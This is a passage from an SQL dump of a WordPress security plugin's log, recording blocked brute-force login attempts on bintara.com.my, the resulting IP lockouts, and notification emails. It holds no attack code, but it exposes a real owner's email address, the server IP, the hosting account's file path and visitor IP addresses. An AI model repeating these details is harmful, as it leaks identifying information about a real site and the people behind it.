empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@4UnlR@6WyRVzpiDq4wAAAAw\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"51.254.175.184\";s:11:\"REMOTE_PORT\";s:4:\"3293\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@4UnlR@6WyRVzpiDq4wAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079009.1732\";s:12:\"REQUEST_TIME\";s:10:\"1569079009\";}}','notice','2019-09-21 15:16:50','2019-09-21 15:16:49',19228832,20716824,'https://bintara.com.my/test/wp-login.php',1,0,'51.254.175.184'),(26580,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:49\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:16:50','2019-09-21 15:16:49',19313760,20716824,'https://bintara.com.my/test/wp-login.php',1,0,'51.254.175.184'),(26581,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:16:50','2019-09-21 15:16:49',19520208,20716824,'https://bintara.com.my/test/wp-login.php',1,0,'51.254.175.184'),(26582,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@6EnlR@6WyRVzpiDq5wAAAA8\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"39402\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@6EnlR@6WyRVzpiDq5wAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079016.6043\";s:12:\"REQUEST_TIME\";s:10:\"1569079016\";}}','notice','2019-09-21 15:16:58','2019-09-21 15:16:56',19227600,20715792,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26583,0,'lockout','host-lockout::52.64.168.0','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:11:\"52.64.168.0\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:56\";s:12:\"lockout_host\";s:11:\"52.64.168.0\";}','action','2019-09-21 15:16:58','2019-09-21 15:16:56',19313448,20715792,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26584,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:11:\"52.64.168.0\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:16:58','2019-09-21 15:16:56',19313504,20715792,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26585,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:16:58','2019-09-21 15:16:56',19521600,20715792,'https://bintara.com.my/2019/wp-login.php',1,0,'52.64.168.0'),(26586,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-JEnlR@6WyRVzpiDrOgAAABY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"213.202.100.9\";s:11:\"REMOTE_PORT\";s:5:\"47508\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-JEnlR@6WyRVzpiDrOgAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079076.5353\";s:12:\"REQUEST_TIME\";s:10:\"1569079076\";}}','notice','2019-09-21 15:17:57','2019-09-21 15:17:56',19229552,20718432,'https://bintara.com.my/wp/wp-login.php',1,0,'213.202.100.9'),(26587,0,'lockout','host-lockout::213.202.100.9','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"213.202.100.9\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:17:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:17:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:17:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:17:56\";s:12:\"lockout_host\";s:13:\"213.202.100.9\";}','action','2019-09-21 15:17:57','2019-09-21 15:17:56',19410896,20718432,'https://bintara.com.my/wp/wp-login.php',1,0,'213.202.100.9'),(26588,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"213.202.100.9\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:17:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:17:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:17:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:17:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:17:57','2019-09-21 15:17:56',19410768,20718432,'https://bintara.com.my/wp/wp-login.php',1,0,'213.202.100.9'),(26589,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:17:58','2019-09-21 15:17:56',19618360,20718432,'https://bintara.com.my/wp/wp-login.php',1,0,'213.202.100.9'),(26590,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-U0nlR@6WyRVzpiDrUQAAABY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"137.74.158.143\";s:11:\"REMOTE_PORT\";s:5:\"60398\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-U0nlR@6WyRVzpiDrUQAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569079123.445\";s:12:\"REQUEST_TIME\";s:10:\"1569079123\";}}','notice','2019-09-21 15:18:44','2019-09-21 15:18:43',19228568,20717016,'https://bintara.com.my/2019/wp-login.php',1,0,'137.74.158.143'),(26591,0,'lockout','host-lockout::137.74.158.143','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"137.74.158.143\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:18:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:18:43\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:18:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:18:43\";s:12:\"lockout_host\";s:14:\"137.74.158.143\";}','action','2019-09-21 15:18:44','2019-09-21 15:18:43',19314448,20717016,'https://bintara.com.my/2019/wp-login.php',1,0,'137.74.158.143'),(26592,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"137.74.158.143\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:18:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:18:43\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:18:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:18:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:18:44','2019-09-21 15:18:43',19314392,20717016,'https://bintara.com.my/2019/wp-login.php',1,0,'137.74.158.143'),(26593,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:18:44','2019-09-21 15:18:43',19522304,20717016,'https://bintara.com.my/2019/wp-login.php',1,0,'137.74.158.143'),(26594,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-WEnlR@6WyRVzpiDrVAAAAAQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"89.22.52.17\";s:11:\"REMOTE_PORT\";s:5:\"58920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-WEnlR@6WyRVzpiDrVAAAAAQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079128.9371\";s:12:\"REQUEST_TIME\";s:10:\"1569079128\";}}','notice','2019-09-21 15:18:50','2019-09-21 15:18:49',19232888,20722104,'https://bintara.com.my/wordpress/wp-login.php',1,0,'89.22.52.17'),(26595,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:18:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:18:49\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:18:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:18:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:18:50','2019-09-21 15:18:49',19318688,20722104,'https://bintara.com.my/wordpress/wp-login.php',1,0,'89.22.52.17'),(26031,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:41:49','2019-09-21 13:41:48',18140784,19340840,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(26032,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 